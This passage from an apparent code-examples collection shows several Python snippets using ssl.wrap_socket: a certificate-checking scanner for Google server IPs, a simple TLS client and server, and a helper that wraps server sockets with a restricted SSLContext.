                     domain = "null"
             return domain, costtime, timeout, gwsname, ssl_orgname
         else:
             s.settimeout(g_conntimeout)
             c = ssl.wrap_socket(s,
                                 cert_reqs=ssl.CERT_REQUIRED,
                                 ca_certs=g_cacertfile,
                                 do_handshake_on_connect=False)
             c.settimeout(g_conntimeout)
             c.connect((ip, 443))
             c.settimeout(g_handshaketimeout)
             c.do_handshake()
             time_end = time.time()
             cert = c.getpeercert()
             costtime = int(time_end * 1000 - time_begin * 1000)
             if 'subject' in cert:
                 subjectitems = cert['subject']
                 for mysets in subjectitems:
                     for item in mysets:
                         if item[0] == "commonName":
                             if not isinstance(item[1], str):
                                 domain = item[1].encode("utf-8")
                             else:
                                 domain = item[1]
                             haserror = 0
                         elif item[0] == "organizationName":
                             if not isinstance(item[1], str):
                                 ssl_orgname = item[1].encode("utf-8")
                             else:
                                 ssl_orgname = item[1]
                 if domain is None:
                     PRINT("%s can not get commonName: %s " %
                           (ip, subjectitems))
             # 如果组织不在g_organizationName,可能不是google的IP,不能使用
             if ssl_orgname == "" or ssl_orgname not in g_organizationName:
                 return domain, costtime, timeout, gwsname, ssl_orgname
             #尝试发送http请求,获取回应头部的Server字段
             #if domain is None or isgoolgledomain(domain) == 2:
             if True:
                 cur_time = time.time()
                 gwsname = self.getgooglesvrname(c, s, ip)
                 time_end = time.time()
                 costtime += int(time_end * 1000 - cur_time * 1000)
                 if domain is None and len(gwsname) > 0:
                     domain = "null"
             return domain, costtime, timeout, gwsname, ssl_orgname
     except SSLError as e:
         time_end = time.time()
         costtime = int(time_end * 1000 - time_begin * 1000)
         if str(e).endswith("timed out"):
             timeout = 1
         else:
             PRINT("SSL Exception(%s): %s, times:%d ms " %
                   (ip, e, costtime))
         return domain, costtime, timeout, gwsname, ssl_orgname
     except IOError as e:
         time_end = time.time()
         costtime = int(time_end * 1000 - time_begin * 1000)
         if str(e).endswith("timed out"):
             timeout = 1
         else:
             PRINT("Catch IO Exception(%s): %s, times:%d ms " %
                   (ip, e, costtime))
         return domain, costtime, timeout, gwsname, ssl_orgname
     except Exception as e:
         time_end = time.time()
         costtime = int(time_end * 1000 - time_begin * 1000)
         PRINT("Catch Exception(%s): %s, times:%d ms " % (ip, e, costtime))
         return domain, costtime, timeout, gwsname, ssl_orgname
     finally:
         if g_useOpenSSL:
             if c:
                 if haserror == 0:
                     c.shutdown()
                     c.sock_shutdown(2)
                 c.close()
             if s:
                 s.close()
         else:
             if c:
                 if haserror == 0:
                     c.shutdown(2)
                 c.close()
             elif s:
                 s.close()
Example #58
0
import socket
import ssl
import datetime
from localMachineInfo import print_machine_info
from server import HOST as SERVER_HOST
from server import PORT as SERVER_PORT

print("Date and time", datetime.datetime.now())

print_machine_info()

HOST = "127.0.0.1"
PORT = 60002

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

client = ssl.wrap_socket(client, keyfile="key.pem", certfile="cert.pem")

if __name__ == "__main__":
    client.bind((HOST, PORT))
    client.connect((SERVER_HOST, SERVER_PORT))

    while True:
        from time import sleep

        client.send("Hello from client!".encode("utf-8"))
        sleep(1)
Example #59
0
    data = connstream.read()
    # null data means the client is finished with us
    while data:
        if data:
            print(data.decode('utf-8'))
            # we'll assume do_something returns False
            # when we're finished with client
            break
        data = connstream.read()
    # finished with client
    connstream.close()


cert_name = "myapp1"

while True:
    newsocket, fromaddr = bindsocket.accept()
    connstream = ssl.wrap_socket(
        newsocket,
        server_side=True,
        certfile="certs/" + cert_name + ".crt",
        keyfile="certs/" + cert_name + ".key",
        #certfile="ssl_cert/"+cert_name+".pem",
        #keyfile="ssl_cert/"+cert_name+".key",
        #                                ca_certs="ssl_cert/"+cert_name+".key",
        cert_reqs=ssl.CERT_REQUIRED,
        #                                certfile="/ssl_cert/cert.pem",
        #                                keyfile="/ssl_cert/key.pem",
        ssl_version=ssl.PROTOCOL_TLSv1)
    deal_with_client(connstream)
Example #60
0
def wrap_socket(socket, certfile, keyfile, password=None):
    """
    Wraps an existing TCP socket and returns an SSLSocket object

    :param socket: The socket to wrap
    :param certfile: The server certificate file
    :param keyfile: The server private key file
    :param password: Password for the private key file (Python >= 3.3)
    :return: The wrapped socket
    :raise SSLError: Error wrapping the socket / loading the certificate
    :raise OSError: A password has been given, but ciphered key files are not
                    supported by the current version of Python
    """
    # Log warnings when some
    logger = logging.getLogger("ssl_wrap")

    def _password_support_error():
        """
        Logs a warning and raises an OSError if a password has been given but
        Python doesn't support ciphered key files.

        :raise OSError: If a password has been given
        """
        if password:
            logger.error("The ssl.wrap_socket() fallback method doesn't "
                         "support key files with a password.")
            raise OSError("Can't decode the SSL key file: "
                          "this version of Python doesn't support it")

    try:
        # Prefer the default context factory, as it will be updated to reflect
        # security issues (Python >= 2.7.9 and >= 3.4)
        default_context = ssl.create_default_context()
    except AttributeError:
        default_context = None

    try:
        # Try to equivalent to create_default_context() in Python 3.5
        # Create an SSL context and set its options
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)

        if default_context is not None:
            # Copy options
            context.options = default_context.options
        else:
            # Set up the context as create_default_context() does in Python 3.5
            # SSLv2 considered harmful
            # SSLv3 has problematic security
            context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3

        # disallow ciphers with known vulnerabilities
        context.set_ciphers(_RESTRICTED_SERVER_CIPHERS)

        try:
            # Load the certificate, with a password
            context.load_cert_chain(certfile, keyfile, password)
        except TypeError:
            # The "password" argument isn't supported
            # Check support for key file password
            _password_support_error()

            # Load the certificate, without the password argument
            context.load_cert_chain(certfile, keyfile)

        # Return the wrapped socket
        return context.wrap_socket(socket, server_side=True)

    except AttributeError as ex:
        # Log a warning to advise the user of possible security holes
        logger.warning("Can't create a custom SSLContext. "
                       "The server should be considered insecure.")
        logger.debug("Missing attribute: %s", ex)

    # Check support for key file password
    _password_support_error()

    # Fall back to the "old" wrap_socket method
    return ssl.wrap_socket(
        socket, server_side=True, certfile=certfile, keyfile=keyfile)